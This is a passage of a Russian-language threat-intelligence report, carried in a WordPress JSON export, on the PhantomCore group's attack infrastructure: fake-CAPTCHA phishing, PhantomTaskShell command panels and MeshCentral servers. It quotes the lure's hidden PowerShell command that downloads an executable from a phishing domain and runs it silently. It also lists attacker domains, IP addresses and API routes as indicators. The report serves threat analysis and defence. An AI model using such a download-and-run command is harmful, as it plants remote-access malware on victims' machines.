\u0441\u0442\u0440\u0430\u0445\u043e\u0432\u0430\u043d\u0438\u044f, \u043f\u043e\u0431\u0443\u0436\u0434\u0430\u0435\u0442 \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435\u043b\u0435\u0439 \u043f\u043e\u0434\u00a0\u043f\u0440\u0435\u0434\u043b\u043e\u0433\u043e\u043c \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f fake CAPTCHA \u0432\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0431\u0443\u0444\u0435\u0440\u0430 \u043e\u0431\u043c\u0435\u043d\u0430 \u0432\u00a0\u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 Windows.<\/p>\n<p><code>powershell -WindowStyle Hidden -Command \"&amp; {iwr 'https:\/\/mgfoms.org\/in.php?action=2' -OutFile '%userprofile%\\dnsclient.exe'; Start-Process '%userprofile%\\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden}\"<\/code><\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0441\u0430\u0439\u0442 \u0441\u00a0fake CAPTCHA<\/figcaption><\/div>\n<\/figure>\n<p>\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0438 \u0441\u043a\u0440\u044b\u0442\u043e\u043c\u0443 \u0437\u0430\u043f\u0443\u0441\u043a\u0443 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 MeshAgent, \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u043e\u0433\u043e \u0441\u00a0\u0442\u043e\u0433\u043e\u00a0\u0436\u0435 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441\u00a0\u0434\u043e\u043c\u0435\u043d\u043e\u043c austolns[.]pw, \u0447\u0442\u043e\u00a0\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440 MeshAgent, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0439 \u0441\u00a0\u043e\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u0448\u0435 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430.<\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 MeshAgent<\/figcaption><\/div>\n<\/figure>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0441\u0430\u0439\u0442:<\/p>\n<p>mgfoms.org <\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440\u044b PhantomTaskShell \u0441\u00a0\u043f\u0430\u043d\u0435\u043b\u044c\u044e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu \u0441\u00a0\u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 SSH\u2011\u0441\u043b\u0443\u0436\u0431\u043e\u0439 \u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c 80\u00a0(HTTP) \u0441\u0435\u0442\u0435\u0432\u044b\u043c \u043f\u043e\u0440\u0442\u043e\u043c, \u043d\u0430\u00a0\u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom c \u0432\u0435\u0431\u2011\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u043e\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432.<\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom<\/figcaption><\/div>\n<\/figure>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u0432\u0441\u0435\u0445 \u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438, \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0437\u0430\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435\u043c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0434\u043b\u044f\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u0445\u043e\u0441\u0442\u0430\u043c\u0438 \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0434\u043e\u0440 PhantomTaskShell. \u041f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 API \u0434\u043b\u044f\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0432\u00a0PowerShell\u2011\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0435\u00a0\u0436\u0435\u0440\u0442\u0432\u044b, \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0438\u0445 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 URL\u2011\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u044b:<\/p>\n<ul>\n<li>\n<p>\/login\u00a0\u2014 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f<\/p>\n<\/li>\n<li>\n<p>\/api\/clients\/\u00a0\u2014 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430<\/p>\n<\/li>\n<li>\n<p>\/api\/clients\/&lt;GUID&gt;\/commands\u00a0\u2014 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434<\/p>\n<\/li>\n<\/ul>\n<p>\u0412\u00a0\u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 favicon \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0430 \u0441\u00a0\u043e\u0442\u0441\u044b\u043b\u043a\u043e\u0439 \u043a\u00a0\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore, \u0432\u00a0\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043a\u043e\u043f\u0438\u0435\u0439 \u043f\u0435\u0440\u0432\u043e\u0439 \u0431\u0443\u043a\u0432\u044b \u0438\u0437\u00a0\u0441\u0442\u0438\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0439 \u0438\u0433\u0440\u044b \u0438 \u0438\u0437\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0438\u0437\u00a0\u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0432\u00a0\u0438\u0433\u0440\u043e\u0432\u043e\u043c \u043a\u043e\u043c\u044c\u044e\u043d\u0438\u0442\u0438 PNG\u2011\u0442\u0440\u0430\u0444\u0430\u0440\u0435\u0442\u0430.<\/p>\n<figure class=\"\">\n<div><figcaption>Favicon \u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom<\/figcaption><\/div>\n<\/figure>\n<figure class=\"\">\n<div><figcaption>\u041e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043b\u044d\u043d\u0434\u0438\u043d\u0433 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0439 \u0438\u0433\u0440\u044b<\/figcaption><\/div>\n<\/figure>\n<p>\u0423\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u043e\u0442\u043f\u0435\u0447\u0430\u0442\u043a\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u0432\u00a0\u0445\u043e\u0434\u0435 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441\u00a0\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043d\u0435\u043b\u044c\u044e Phantom, \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0442\u044c \u0438\u0445 \u0432\u0437\u0430\u0438\u043c\u043e\u0441\u0432\u044f\u0437\u044c \u043f\u043e\u00a0\u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0434\u043d\u043e\u0439 C2-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b (payload\u2011\u0445\u0430\u0431\u044b, \u043f\u0440\u043e\u043a\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u0430\u0433\u0440\u0435\u0433\u0430\u0442\u043e\u0440\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445), \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u0442\u044c \u0437\u043d\u0430\u043d\u0438\u044f \u043e\u00a0\u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u0438\u00a0\u0436\u0435\u0440\u0442\u0432\u0430\u0445, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u00a0\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Positive Technologies.<\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u0414\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u00a0\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441\u00a0\u043f\u0430\u043d\u0435\u043b\u044c\u044e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom \u043d\u0430\u00a0PT Threat Intelligence Portal <\/figcaption><\/div>\n<\/figure>\n<\/li>\n<li>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440\u044b MeshAgent<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu \u0441\u00a0\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 MeshCentral, \u043e\u00a0\u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 TLS\u2011\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u044b \u043d\u0430\u00a0\u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c 443\u00a0(HTTPS) \u0441\u0435\u0442\u0435\u0432\u043e\u043c \u043f\u043e\u0440\u0442\u0435.<\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u0430 c TLS\u2011\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f\u00a0austolns[.]pw<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\">\n<div><figcaption>TLS\u2011\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u0430 c \u0434\u043e\u043c\u0435\u043d\u043e\u043c austolns[.]pw<\/figcaption><\/div>\n<\/figure>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f (Persistence) \u0434\u043b\u044f\u00a0\u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438\u043c\u0438 \u0447\u0435\u0440\u0435\u0437 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b MeshAgent, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430\u043c\u0438 PhantomRAT \u0438 PhantomRShell \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0433\u043e\u00a0\u043b\u0438\u0431\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u043e\u0432.<\/p>\n<p>\u0412\u00a0\u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 PhantomCore \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0446\u0435\u043b\u044b\u0439 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441 \u043c\u0435\u0440 \u043a\u043e\u043d\u0441\u043f\u0438\u0440\u0430\u0446\u0438\u0438, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f \u0438\u0445 \u043f\u043e\u0434\u00a0\u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u0443\u044e IT\u2011\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443:<\/p>\n<ul>\n<li>\n<p>\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u0432\u0435\u0431\u2011\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u043e\u0432 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u00a0\u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 Mattermost\u2011 \u0438 Nextcloud\u2011\u0441\u0435\u0440\u0432\u0438\u0441\u044b<\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u0432\u0435\u0431\u2011\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 MeshCentral \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u043e\u0434\u00a0Mattermost<\/figcaption><\/div>\n<\/figure>\n<\/li>\n<li>\n<p>IT\u2011\u043c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0445 \u0438\u043c\u0435\u043d MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0434\u043e\u043c\u0435\u043d\u044b \u0441\u00a0\u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f:<\/p>\n<p><code>nextcloud.soft-trust.com<br \/>nextcloud.1cbit.dev<br \/>nextcloud.trust-sec.it.com<br \/>softline-solutions.cloud<\/code><\/p>\n<p>\u0420\u044f\u0434 \u0434\u043e\u043c\u0435\u043d\u043e\u0432\u00a0\u0431\u044b\u043b \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0438\u043d\u0430 \u0420\u043e\u0441\u0441\u0438\u0438 \u0438 \u0430\u0434\u0440\u0435\u0441\u0430 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b emilygrace1981@proton[.]me, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u00a0\u0438\u043d\u044b\u043c\u0438 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore c IT\u2011\u043c\u0438\u043c\u0438\u043a\u0440\u0438\u0435\u0439:<\/p>\n<p><code>polylab.top<br \/>techinnovators.world<br \/>blockchaineech.world<br \/>agrotech.homes<br \/>miucroprocessors.world<br \/>cybersedcurity.world<br \/>reconfiguratifon.world<br \/>telecommuunication.world<br \/>interoperaebility.world<\/code><\/p>\n<\/li>\n<li>\n<p>\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u043f\u043e\u0434\u00a0\u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 IT\u2011\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438<\/p>\n<p>\u041d\u0430 81\u00a0(HTTP) \u0441\u0435\u0442\u0435\u0432\u043e\u043c \u043f\u043e\u0440\u0442\u0435 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043b\u044d\u043d\u0434\u0438\u043d\u0433 \u0441\u00a0HTML\u2011\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u043e\u0439, \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u00a0\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u0430\u0439\u0442\u043e\u0432 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 IT\u2011\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439.<\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u043f\u043e\u0434\u00a0\u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0439 IT\u2011\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440<\/figcaption><\/div>\n<\/figure>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 MeshCentral \u0434\u043e\u043c\u0435\u043d\u044b \u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u044b:<\/p>\n<p><code>austolns.pw<br \/>nextcloud.soft-trust.com<br \/>nextcloud.1cbit.dev<br \/>nextcloud.trust-sec.it.com<br \/>softline-solutions.cloud<\/code><\/p>\n<p><code>194.87.253.233<br \/> 213.232.204.110<br \/> 194.116.215.36<br \/> 46.8.71.104<br \/> 217.19.4.206<br \/> 91.239.148.211<\/code><\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u043a\u0441\u0438\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b PhantomProxyLite, RSocx, SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u0435\u0439<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c<\/p>\n<\/li>\n<\/ol>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-473472","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/473472","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=473472"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/473472\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=473472"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=473472"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=473472"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}